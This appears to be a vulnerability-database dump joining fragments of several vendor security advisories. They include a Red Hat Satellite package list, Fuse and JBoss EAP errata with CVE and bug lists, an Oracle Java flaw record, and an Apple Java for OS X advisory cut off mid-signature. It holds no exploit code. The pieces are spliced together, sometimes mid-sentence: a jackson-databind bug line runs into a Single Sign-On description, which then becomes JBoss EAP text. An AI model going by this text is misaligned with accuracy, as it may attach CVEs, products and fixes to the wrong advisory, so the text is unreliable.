tfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm
tfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm
tfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm
tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm
tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm
tfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm
tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm
tfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm
tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm
tfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm
tfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm
tfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm
tfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm
tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm
tfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm
tfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm
tfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm
tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm
tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm
tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm
tfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm
tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm
tfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm
tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm
tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm
tfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm
x86_64:
createrepo_c-0.7.4-1.el7sat.x86_64.rpm
createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm
createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm
foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm
foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm
hfsplus-tools-332.14-12.el7.x86_64.rpm
hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm
libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm
libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm
libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm
libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm
libwebsockets-2.4.2-2.el7.x86_64.rpm
libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm
livecd-tools-20.4-1.6.el7sat.x86_64.rpm
mod_passenger-4.0.18-24.el7sat.x86_64.rpm
mod_xsendfile-0.12-11.el7sat.x86_64.rpm
mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm
ostree-2017.1-2.atomic.el7.x86_64.rpm
ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm
pcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm
puppet-agent-6.14.0-2.el7sat.x86_64.rpm
pycairo-1.16.3-9.el7sat.x86_64.rpm
pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm
pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm
python-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm
python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm
python-bson-3.2-2.el7sat.x86_64.rpm
python-imgcreate-20.4-1.6.el7sat.x86_64.rpm
python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm
python-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm
python-psutil-5.0.1-3.el7sat.x86_64.rpm
python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm
python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm
python-pymongo-3.2-2.el7sat.x86_64.rpm
python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm
python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm
python-qpid-proton-0.28.0-3.el7.x86_64.rpm
python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm
python-saslwrapper-0.22-5.el7sat.x86_64.rpm
python-simplejson-3.2.0-1.el7sat.x86_64.rpm
python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm
python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm
python-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm
python-zope-interface-4.0.5-4.el7.x86_64.rpm
python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm
python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm
python2-gobject-3.28.3-2.el7sat.x86_64.rpm
python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm
python2-markupsafe-0.23-21.el7sat.x86_64.rpm
python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm
python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm
python2-twisted-16.4.1-12.el7sat.x86_64.rpm
python3-aiohttp-3.6.2-4.el7ar.x86_64.rpm
python3-multidict-4.7.4-2.el7ar.x86_64.rpm
python3-yarl-1.4.2-2.el7ar.x86_64.rpm
qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm
qpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm
qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm
qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm
qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm
qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm
qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm
qpid-proton-c-0.28.0-3.el7.x86_64.rpm
qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm
qpid-qmf-1.36.0-28.el7amq.x86_64.rpm
rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm
rubygem-facter-2.4.1-2.el7sat.x86_64.rpm
rubygem-newt-0.9.6-3.el7sat.x86_64.rpm
rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm
rubygem-passenger-4.0.18-24.el7sat.x86_64.rpm
rubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm
rubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm
rubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm
saslwrapper-0.22-5.el7sat.x86_64.rpm
saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm
tfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm
tfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm
tfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm
tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm
tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm
tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm
tfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm
tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm
tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm
tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm
tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm
tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm
tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm
tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm
tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm
tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm
tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm
tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm
tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm
tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm
tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm
tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm
tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm
tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm
tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm
tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm
tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm
tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm
tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm
tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm
tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm
tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm
tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm
tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm
tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm
tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-3258
https://access.redhat.com/security/cve/CVE-2018-11751
https://access.redhat.com/security/cve/CVE-2019-12781
https://access.redhat.com/security/cve/CVE-2019-16782
https://access.redhat.com/security/cve/CVE-2020-5216
https://access.redhat.com/security/cve/CVE-2020-5217
https://access.redhat.com/security/cve/CVE-2020-5267
https://access.redhat.com/security/cve/CVE-2020-7238
https://access.redhat.com/security/cve/CVE-2020-7663
https://access.redhat.com/security/cve/CVE-2020-7942
https://access.redhat.com/security/cve/CVE-2020-7943
https://access.redhat.com/security/cve/CVE-2020-8161
https://access.redhat.com/security/cve/CVE-2020-8184
https://access.redhat.com/security/cve/CVE-2020-8840
https://access.redhat.com/security/cve/CVE-2020-9546
https://access.redhat.com/security/cve/CVE-2020-9547
https://access.redhat.com/security/cve/CVE-2020-9548
https://access.redhat.com/security/cve/CVE-2020-10693
https://access.redhat.com/security/cve/CVE-2020-10968
https://access.redhat.com/security/cve/CVE-2020-10969
https://access.redhat.com/security/cve/CVE-2020-11619
https://access.redhat.com/security/cve/CVE-2020-14061
https://access.redhat.com/security/cve/CVE-2020-14062
https://access.redhat.com/security/cve/CVE-2020-14195
https://access.redhat.com/security/cve/CVE-2020-14334
https://access.redhat.com/security/cve/CVE-2020-14380
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK
1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa
5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr
oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f
Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io
OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX
k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG
C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5
/6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta
D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a
f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG
1yK/tAm1KBU=osSG
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
The purpose of this text-only errata is to inform you about the security
issues fixed in this release.
Security Fix(es):
* netty (CVE-2016-4970 CVE-2020-7238 CVE-2019-20444 CVE-2019-20445)
* dom4j (CVE-2018-1000632)
* elasticsearch (CVE-2018-3831)
* pdfbox (CVE-2018-11797)
* vertx (CVE-2018-12541)
* spring-data-jpa (CVE-2019-3797)
* mina-core (CVE-2019-0231)
* jackson-databind (CVE-2019-12086 CVE-2019-16335 CVE-2019-14540
CVE-2019-17267 CVE-2019-14892 CVE-2019-14893 CVE-2019-16942 CVE-2019-16943
CVE-2019-17531 CVE-2019-20330 CVE-2020-10673 CVE-2020-10672 CVE-2020-8840
CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969
CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11620 CVE-2020-11619
CVE-2020-14195 CVE-2020-14060 CVE-2020-14061 CVE-2020-14062)
* jackson-mapper-asl (CVE-2019-10172)
* hawtio (CVE-2019-9827)
* undertow (CVE-2019-9511 CVE-2020-1757 CVE-2019-14888 CVE-2020-1745)
* santuario (CVE-2019-12400)
* apache-commons-beanutils (CVE-2019-10086)
* cxf (CVE-2019-17573)
* apache-commons-configuration (CVE-2020-1953)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Installation instructions are available from the Fuse 7.7.0 product
documentation page:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
4. Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl
1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents
1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API
1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service
1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake
1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries
1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure.
1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak
project, that provides authentication and standards-based single sign-on
capabilities for web and mobile applications.
This release of Red Hat JBoss Enterprise Application Platform 7.3.1 serves
as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.0,
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise
Application Platform 7.3.1 Release Notes for information about the most
significant bug fixes and enhancements included in this release.
Security Fix(es):
* cxf: reflected XSS in the services listing page (CVE-2019-17573)
* cxf-core: cxf: OpenId Connect token service does not properly validate
the clientId (CVE-2019-12423)
* jackson-mapper-asl: XML external entity similar to CVE-2016-3720
(CVE-2019-10172)
* undertow: servletPath in normalized incorrectly leading to dangerous
application mapping which could result in security bypass (CVE-2020-1757)
* jackson-databind: XML external entity similar to CVE-2016-3720
(CVE-2019-10172)
* jackson-mapper-asl: XML external entity similar to CVE-2016-3720
(CVE-2019-10172)
* resteasy-jaxrs: resteasy: Improper validation of response header in
MediaTypeHeaderDelegate.java class (CVE-2020-1695)
* cryptacular: excessive memory allocation during a decode operation
(CVE-2020-7226)
* smallrye-config: SmallRye: SecuritySupport class is incorrectly public
and contains a static method to access the current threads context class
loader (CVE-2020-1729)
* resteasy: RESTEASY003870 exception in RESTEasy can lead to a reflected
XSS attack (CVE-2020-10688)
* jackson-databind: Lacks certain xbean-reflect/JNDI blocking
(CVE-2020-8840)
* undertow: invalid HTTP request with large chunk size (CVE-2020-10719)
* jackson-databind: Serialization gadgets in shaded-hikari-config
(CVE-2020-9546)
* jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)
* jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)
* undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)
* libthrift: thrift: Endless loop when feed with specific input data
(CVE-2019-0205)
* libthrift: thrift: Out-of-bounds read related to TJSONProtocol or
TSimpleJSONProtocol (CVE-2019-0210)
* wildfly: The 'enabled-protocols' value in legacy security is not
respected if OpenSSL security provider is in use (CVE-2019-14887)
* jsf-impl: Mojarra: Path traversal via either the loc parameter or the con
parameter, incomplete fix of CVE-2018-14371 (CVE-2020-6950)
* jsf-impl: mojarra: Path traversal in
ResourceManager.java:getLocalePrefix() via the loc parameter
(CVE-2018-14371)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, see the CVE page(s) listed in the
References section. Bugs fixed (https://bugzilla.redhat.com/):
1607709 - CVE-2018-14371 mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter
1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720
1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class
1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass
1764607 - CVE-2019-0210 thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol
1764612 - CVE-2019-0205 thrift: Endless loop when feed with specific input data
1772008 - CVE-2019-14887 wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use
1797006 - CVE-2019-12423 cxf: OpenId Connect token service does not properly validate the clientId
1797011 - CVE-2019-17573 cxf: reflected XSS in the services listing page
1801380 - CVE-2020-7226 cryptacular: excessive memory allocation during a decode operation
1802444 - CVE-2020-1729 SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader
1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371
1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability
1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size
6. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-16114 - (7.3.z) Upgrade jboss-vfs to 3.2.15.Final
JBEAP-18060 - [GSS](7.3.z) Upgrade weld from 3.1.2.Final-redhat-00001 to 3.1.4.Final-redhat-00001
JBEAP-18163 - (7.3.z) Upgrade HAL from 3.2.3.Final-redhat-00001 to 3.2.8.Final-redhat-00001
JBEAP-18221 - (7.3.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00010 to 2.5.5.SP12-redhat-00012
JBEAP-18240 - (7.3.z) Update the Chinese translations in WildFly Core
JBEAP-18241 - (7.3.z) Update the Japanese translations in WildFly Core
JBEAP-18273 - (7.3.z) Upgrade IronJacamar from 1.4.19.Final to 1.4.20.Final
JBEAP-18277 - [GSS](7.3.z) Upgrade JBoss JSF API from 3.0.0.SP01-redhat-00001 to 3.0.0.SP02-redhat-00001
JBEAP-18288 - [GSS](7.3.z) Upgrade FasterXML from 2.10.0 to 2.10.3
JBEAP-18294 - (7.3.z) Upgrade JAXB from 2.3.1 to 2.3.3-b02 and com.sun.istack from 3.0.7 to 3.0.10
JBEAP-18302 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.18 to 1.0.20
JBEAP-18315 - [GSS](7.3.z) Upgrade Artemis from 2.9.0.redhat-00005 to 2.9.0.redhat-00010
JBEAP-18346 - [GSS](7.3.z) Upgrade jakarta.el from 3.0.2.redhat-00001 to 3.0.3.redhat-00002
JBEAP-18352 - [GSS](7.3.z) Upgrade JBoss Remoting from 5.0.16.Final-redhat-00001 to 5.0.18.Final-redhat-00001
JBEAP-18361 - [GSS](7.3.z) Upgrade Woodstox from 5.0.3 to 6.0.3
JBEAP-18367 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.15 to 5.3.16
JBEAP-18393 - [GSS](7.3.z) Update $JBOSS_HOME/docs/schema to show https schema URL instead of http
JBEAP-18399 - Tracker bug for the EAP 7.3.1 release for RHEL-8
JBEAP-18409 - [GSS](7.3.z) Upgrade Infinispan from 9.4.16.Final-redhat-00002 to 9.4.18.Final-redhat-00001
JBEAP-18527 - (7.3.z) Upgrade WildFly Naming Client from 1.0.10.Final to 1.0.12.Final
JBEAP-18528 - (7.3.z) Upgrade jboss-ejb-client from 4.0.27.Final to 4.0.31.Final-redhat-00001
JBEAP-18596 - [GSS](7.3.z) Upgrade JBoss Modules from 1.9.1 to 1.10.0
JBEAP-18598 - [GSS](7.3.z) Upgrade Bouncycastle from 1.60.0-redhat-00001 to 1.60.0-redhat-00002
JBEAP-18640 - [Runtimes] (7.3.x) Upgrade slf4j-jboss-logmanager from 1.0.3.GA.redhat-2 to 1.0.4.GA.redhat-00001
JBEAP-18653 - (7.3.z) Upgrade Apache CXF from 3.3.4.redhat-00001 to 3.3.5.redhat-00001
JBEAP-18706 - (7.3.z) Upgrade elytron-web from 1.6.0.Final to 1.6.1.Final
JBEAP-18770 - Upgrade Jandex to 2.1.2.Final-redhat-00001
JBEAP-18775 - (7.3.z) Upgrade WildFly Core to 10.1.4.Final-redhat-00001
JBEAP-18788 - (7.3.x) Upgrade wss4j from 2.2.4.redhat-00001 to 2.2.5.redhat-00001
JBEAP-18790 - (7.3.z) Upgrade cryptacular from 1.2.0.redhat-1 to 1.2.4.redhat-00001
JBEAP-18818 - (7.3.z) Upgrade PicketBox from 5.0.3.Final-redhat-00005 to 5.0.3.Final-redhat-00006
JBEAP-18836 - [GSS](7.3.z) Upgrade Remoting JMX from 3.0.3 to 3.0.4
JBEAP-18850 - (7.3.z) Upgrade smallrye-config from 1.4.1 to 1.6.2
JBEAP-18870 - Upgrade WildFly Common to 1.5.2.Final.redhat-00002
JBEAP-18875 - Upgrade MicroProfile Metrics API to 2.3 and smallrye-metrics to 2.4.0
JBEAP-18876 - Upgrade Smallrye Health to 2.2.0 and MP Health API to 2.2
JBEAP-18877 - (7.3.z) Upgrade Jaeger client to 0.34.3
JBEAP-18878 - Upgrade Smallrye Opentracing to 1.3.4 and MP Opentracing to 1.3.3
JBEAP-18879 - (7.3.z) Upgrade MicroProfile Config 1.4
JBEAP-18929 - (7.3.z) Upgrade WildFly Elytron from 1.10.5.Final-redhat-00001 to 1.10.6.Final
JBEAP-18990 - (7.3.z) Upgrade jasypt from 1.9.2 to 1.9.3-redhat-00001
JBEAP-18991 - (7.3.z) Upgrade opensaml from 3.3.0.redhat-1 to 3.3.1-redhat-00002
JBEAP-19035 - In Building Custom Layers, update pom.xml content for 7.3.1
JBEAP-19054 - Upgrade MP REST Client to 1.4.0.redhat-00004
JBEAP-19066 - Upgrade snakeyaml from 1.18.0.redhat-2 to 1.24.0.redhat-00001
JBEAP-19117 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.2.Final-redhat-00001 to 2.0.4.Final-redhat-00001
JBEAP-19133 - [GSS](7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP08-redhat-00001 to 2.3.9.SP09-redhat-00001
JBEAP-19156 - (7.3.z) Upgrade RESTEasy from 3.11.1.Final.redhat-00001 to 3.11.2.Final.redhat-00001
JBEAP-19181 - (7.3.z) Upgrade WildFly Core to 10.1.5.Final-redhat-00001
JBEAP-19192 - (7.3.z) Update the Japanese translations
JBEAP-19232 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.7.Final-redhat-00001
JBEAP-19281 - (7.3.z) Upgrade undertow from 2.0.30.SP2-redhat-00001 to 2.0.30.SP3-redhat-00001
JBEAP-19456 - Upgrade wildfly-transaction-client to 1.1.11.Final
7 |
|
var-201302-0132
|
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior, 5.0 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
These issues were addressed by updating to Java version 1.6.0_41. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
These issues were addressed by updating to Java version 1.6.0_41.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
